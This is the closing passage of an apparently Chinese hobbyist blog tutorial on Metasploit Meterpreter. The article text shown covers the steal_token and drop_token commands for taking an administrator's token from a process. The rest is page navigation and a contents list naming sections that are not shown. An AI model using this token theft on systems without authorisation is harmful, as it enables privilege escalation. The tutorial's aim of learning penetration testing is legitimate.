<h3 id="（2）steal-token窃取令牌"><a href="#（2）steal-token窃取令牌" class="headerlink" title="（2）steal_token窃取令牌"></a>（2）steal_token窃取令牌</h3><p>先查看进程后面的token值，然后找到管理员的token，然后再通过pid获取他的token</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">steal_token &lt;pid值&gt;   <span class="comment">#从指定进程中窃取token   先ps</span></span><br><span class="line">drop_token  <span class="comment">#删除窃取的token</span></span><br></pre></td></tr></table></figure>

</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="https://threeshui.github.io">Maxenton</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://threeshui.github.io/2022/05/04/MSF%E5%88%9D%E4%BD%93%E9%AA%8C%EF%BC%88%E4%BA%8C%EF%BC%89/">https://threeshui.github.io/2022/05/04/MSF%E5%88%9D%E4%BD%93%E9%AA%8C%EF%BC%88%E4%BA%8C%EF%BC%89/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://threeshui.github.io" target="_blank">Maxenton</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/">信息安全</a><a class="post-meta__tags" href="/tags/%E5%B7%A5%E5%85%B7%E5%AD%A6%E4%B9%A0/">工具学习</a></div><div class="post_share"><div class="social-share" data-image="/img/MSF01.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2022/05/07/Python%E5%AD%A6%E4%B9%A0%E6%97%A5%E8%AE%B0%EF%BC%88%E5%85%AB%EF%BC%89/"><img class="prev-cover" src="/img/python_img.png" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">Python学习日记（八）</div></div></a></div><div class="next-post pull-right"><a href="/2022/05/04/MSF%E5%88%9D%E4%BD%93%E9%AA%8C%EF%BC%88%E4%B8%89%EF%BC%89/"><img class="next-cover" src="/img/MSF01.png" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">MSF初体验（三）</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>相关推荐</span></div><div class="relatedPosts-list"><div><a href="/2022/06/18/Cobalt%20Strike%E4%BD%93%E9%AA%8C/" title="Cobalt Strike体验"><img class="cover" src="/img/cs01.jpeg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-06-18</div><div class="title">Cobalt Strike体验</div></div></a></div><div><a href="/2021/11/01/Git%E7%9A%84%E5%BC%BA%E5%A4%A7/" title="Git的强大之处"><img class="cover" src="/img/git01.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-11-01</div><div class="title">Git的强大之处</div></div></a></div><div><a href="/2021/10/20/BurpSuite%E5%B7%A5%E5%85%B7%E7%9A%84%E5%AD%A6%E4%B9%A0%E4%B8%8E%E4%BD%BF%E7%94%A8/" title="BurpSuite工具的学习与使用"><img class="cover" src="/img/burp01.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-10-20</div><div class="title">BurpSuite工具的学习与使用</div></div></a></div><div><a href="/2022/04/30/MSF%E5%88%9D%E4%BD%93%E9%AA%8C%EF%BC%88%E4%B8%80%EF%BC%89/" title="MSF初体验（一）"><img class="cover" src="/img/MSF01.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-04-30</div><div class="title">MSF初体验（一）</div></div></a></div><div><a href="/2022/05/04/MSF%E5%88%9D%E4%BD%93%E9%AA%8C%EF%BC%88%E4%B8%89%EF%BC%89/" title="MSF初体验（三）"><img class="cover" src="/img/MSF01.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-05-04</div><div class="title">MSF初体验（三）</div></div></a></div><div><a href="/2022/05/01/Linux%E6%8F%90%E6%9D%83/" title="Linux提权"><img class="cover" src="/img/getshell.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-05-01</div><div class="title">Linux提权</div></div></a></div></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/head.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">Maxenton</div><div class="author-info__description">一个啥都只会一点的白帽子</div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">76</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">38</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">38</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://blog.csdn.net/qq_15131581?spm=1030.2200.3001.5343"><i class="fab fa-cuttlefish"></i><span>CSDN欢迎关注</span></a><div class="card-info-social-icons is-center"><a class="social-icon" href="https://github.com/threeshui" target="_blank" title="Github"><i class="fab fa-github"></i></a><a class="social-icon" href="mailto:peiyimiao@foxmail.com" target="_blank" title="Email"><i class="fas fa-envelope"></i></a><a class="social-icon" href="https://blog.csdn.net/qq_15131581?spm=1030.2200.3001.5343" target="_blank" title=""><i class="fab fa-cuttlefish"></i></a></div></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">欢迎来到这里，愿君所遇即所爱！</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%80%E3%80%81Meterpreter%E7%AE%80%E4%BB%8B"><span class="toc-number">1.</span> <span class="toc-text">一、Meterpreter简介</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BA%8C%E3%80%81Meterpreter%E5%9F%BA%E6%9C%AC%E5%91%BD%E4%BB%A4"><span class="toc-number">2.</span> <span class="toc-text">二、Meterpreter基本命令</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1%E3%80%81%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4"><span class="toc-number">2.1.</span> <span class="toc-text">1、系统命令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%EF%BC%881%EF%BC%89%E5%9F%BA%E6%9C%AC%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4"><span class="toc-number">2.1.1.</span> <span class="toc-text">（1）基本系统命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%EF%BC%882%EF%BC%89uictl%E5%BC%80%E5%85%B3%E9%94%AE%E7%9B%98-x2F-%E9%BC%A0%E6%A0%87"><span class="toc-number">2.1.2.</span> <span class="toc-text">（2）uictl开关键盘&#x2F;鼠标</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%EF%BC%883%EF%BC%89webcam%E6%91%84%E5%83%8F%E5%A4%B4%E5%91%BD%E4%BB%A4"><span class="toc-number">2.1.3.</span> <span class="toc-text">（3）webcam摄像头命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%EF%BC%884%EF%BC%89%E6%89%A7%E8%A1%8Cexe%E6%96%87%E4%BB%B6"><span class="toc-number">2.1.4.</span> <span class="toc-text">（4）执行exe文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%EF%BC%885%EF%BC%89migrate%E8%BF%9B%E7%A8%8B%E8%BF%81%E7%A7%BB"><span class="toc-number">2.1.5.</span> <span class="toc-text">（5）migrate进程迁移</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%EF%BC%886%EF%BC%89clearav%E6%B8%85%E6%A5%9A%E6%97%A5%E5%BF%97"><span class="toc-number">2.1.6.</span> <span class="toc-text">（6）clearav清楚日志</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2%E3%80%81%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4"><span class="toc-number">2.2.</span> <span class="toc-text">2、文件系统命令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%EF%BC%881%EF%BC%89%E5%9F%BA%E7%A1%80%E5%91%BD%E4%BB%A4"><span class="toc-number">2.2.1.</span> <span class="toc-text">（1）基础命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%EF%BC%882%EF%BC%89%E4%B8%8A%E4%BC%A0%E6%96%87%E4%BB%B6"><span class="toc-number">2.2.2.</span> <span class="toc-text">（2）上传文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%EF%BC%883%EF%BC%89%E4%B8%8B%E8%BD%BD%E6%96%87%E4%BB%B6"><span class="toc-number">2.2.3.</span> <span class="toc-text">（3）下载文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%EF%BC%884%EF%BC%89Timestomp%E4%BC%AA%E9%80%A0%E6%97%B6%E9%97%B4%E6%88%B3"><span class="toc-number">2.2.4.</span> <span class="toc-text">（4）Timestomp伪造时间戳</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3%E3%80%81%E7%BD%91%E7%BB%9C%E5%91%BD%E4%BB%A4"><span class="toc-number">2.3.</span> <span class="toc-text">3、网络命令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%EF%BC%881%EF%BC%89%E5%9F%BA%E6%9C%AC%E7%BD%91%E7%BB%9C%E5%91%BD%E4%BB%A4"><span class="toc-number">2.3.1.</span> <span class="toc-text">（1）基本网络命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%EF%BC%882%EF%BC%89portfwd%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91"><span class="toc-number">2.3.2.</span> <span class="toc-text">（2）portfwd端口转发</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%EF%BC%883%EF%BC%89autoroute%E6%B7%BB%E5%8A%A0%E8%B7%AF%E7%94%B1"><span class="toc-number">2.3.3.</span> <span class="toc-text">（3）autoroute添加路由</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%EF%BC%884%EF%BC%89Socks4a%E4%BB%A3%E7%90%86"><span class="toc-number">2.3.4.</span> <span class="toc-text">（4）Socks4a代理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%EF%BC%883%EF%BC%89%E5%86%85%E6%A0%B8%E6%BC%8F%E6%B4%9E%E6%8F%90%E6%9D%83"><span class="toc-number">2.3.5.</span> <span class="toc-text">（3）内核漏洞提权</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5%E3%80%81kiwi%E8%8E%B7%E5%8F%96%E5%AF%86%E7%A0%81"><span class="toc-number">2.4.</span> <span class="toc-text">5、kiwi获取密码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6%E3%80%81%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2-amp-%E6%88%AA%E5%B1%8F"><span class="toc-number">2.5.</span> <span class="toc-text">6、远程桌面&amp;截屏</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7%E3%80%81%E5%BC%80%E5%90%AFRDP-amp-%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7"><span class="toc-number">2.6.</span> <span class="toc-text">7、开启RDP&amp;添加用户</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%EF%BC%881%EF%BC%89getgui%E5%91%BD%E4%BB%A4"><span class="toc-number">2.6.1.</span> <span class="toc-text">（1）getgui命令</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#8%E3%80%81%E9%94%AE%E7%9B%98%E8%AE%B0%E5%BD%95"><span class="toc-number">2.7.</span> <span class="toc-text">8、键盘记录</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#9%E3%80%81sniffer%E6%8A%93%E5%8C%85"><span class="toc-number">2.8.</span> <span class="toc-text">9、sniffer抓包</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#10%E3%80%81%E4%BB%A4%E7%89%8C%E6%93%8D%E7%BA%B5"><span class="toc-number">2.9.</span> <span class="toc-text">10、令牌操纵</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%EF%BC%882%EF%BC%89steal-token%E7%AA%83%E5%8F%96%E4%BB%A4%E7%89%8C"><span class="toc-number">2.9.1.</span> <span class="toc-text">（2）steal_token窃取令牌</span></a></li></ol></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/2022/11/21/%E5%9F%9F%E7%8E%AF%E5%A2%83%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/" title="无题"><img src="https://img.mahaofei.com/img/linux_debian.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="无题"/></a><div class="content"><a class="title" href="/2022/11/21/%E5%9F%9F%E7%8E%AF%E5%A2%83%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/" title="无题">无题</a><time datetime="2022-11-21T06:14:02.021Z" title="发表于 2022-11-21 14:14:02">2022-11-21</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/11/14/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/" title="红日靶场1域控-打靶记录"><img src="/img/hongri.jpeg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="红日靶场1域控-打靶记录"/></a><div class="content"><a class="title" href="/2022/11/14/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95/" title="红日靶场1域控-打靶记录">红日靶场1域控-打靶记录</a><time datetime="2022-11-13T16:00:00.000Z" title="发表于 2022-11-14 00:00:00">2022-11-14</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/11/01/%E7%94%9F%E5%91%BD%E5%9C%A8%E4%BA%8E%E5%AD%A6%E4%B9%A0%E2%80%94%E2%80%94%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" title="文件包含漏洞的学习"><img src="/img/baohan.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="文件包含漏洞的学习"/></a><div class="content"><a class="title" href="/2022/11/01/%E7%94%9F%E5%91%BD%E5%9C%A8%E4%BA%8E%E5%AD%A6%E4%B9%A0%E2%80%94%E2%80%94%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" title="文件包含漏洞的学习">文件包含漏洞的学习</a><time datetime="2022-10-31T16:00:00.000Z" title="发表于 2022-11-01 00:00:00">2022-11-01</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/10/25/%E7%94%9F%E5%91%BD%E5%9C%A8%E4%BA%8E%E5%AD%A6%E4%B9%A0%E2%80%94%E2%80%94%E6%96%87%E4%BB%B6%E8%A7%A3%E6%9E%90/" title="文件解析漏洞的学习"><img src="/img/jiexi.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="文件解析漏洞的学习"/></a><div class="content"><a class="title" href="/2022/10/25/%E7%94%9F%E5%91%BD%E5%9C%A8%E4%BA%8E%E5%AD%A6%E4%B9%A0%E2%80%94%E2%80%94%E6%96%87%E4%BB%B6%E8%A7%A3%E6%9E%90/" title="文件解析漏洞的学习">文件解析漏洞的学习</a><time datetime="2022-10-24T16:00:00.000Z" title="发表于 2022-10-25 00:00:00">2022-10-25</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/10/15/%E7%94%9F%E5%91%BD%E5%9C%A8%E4%BA%8E%E6%8A%98%E8%85%BE%E2%80%94%E2%80%94SQL%E6%B3%A8%E5%85%A5%E7%9A%84%E5%AE%9E%E6%93%8D%EF%BC%88%E5%85%AD%EF%BC%89less26-30/" title="SQL注入靶场（六）"><img src="/img/sqlbachang.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="SQL注入靶场（六）"/></a><div class="content"><a class="title" href="/2022/10/15/%E7%94%9F%E5%91%BD%E5%9C%A8%E4%BA%8E%E6%8A%98%E8%85%BE%E2%80%94%E2%80%94SQL%E6%B3%A8%E5%85%A5%E7%9A%84%E5%AE%9E%E6%93%8D%EF%BC%88%E5%85%AD%EF%BC%89less26-30/" title="SQL注入靶场（六）">SQL注入靶场（六）</a><time datetime="2022-10-14T16:00:00.000Z" title="发表于 2022-10-15 00:00:00">2022-10-15</time></div></div></div></div></div></div></main><footer id="footer" style="background-image: url('/img/MSF01.png')"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2022 By Maxenton</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"></div><div id="rightside-config-show"><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div id="local-search"><div class="search-dialog"><nav class="search-nav"><span class="search-dialog-title">搜索</span><span id="loading-status"></span><button class="search-close-button"><i class="fas fa-times"></i></button></nav><div class="is-center" id="loading-database"><i class="fas fa-spinner fa-pulse"></i><span>  数据库加载中</span></div><div class="search-wrap"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章" type="text"/></div></div><hr/><div id="local-search-results"></div></div></div><div id="search-mask"></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.min.js"></script><script src="/js/search/local-search.js"></script><div class="js-pjax"></div><script src="/js/custom/custom.js"></script><script defer="defer" id="ribbon" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/canvas-ribbon.min.js" size="150" alpha="0.6" zIndex="-1" mobile="false" data-click="true"></script><script defer="defer" id="fluttering_ribbon" mobile="false" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/canvas-fluttering-ribbon.min.js"></script><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/activate-power-mode.min.js"></script><script>POWERMODE.colorful = true;
POWERMODE.shake = true;
POWERMODE.mobile = false;
document.body.addEventListener('input', POWERMODE);
</script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>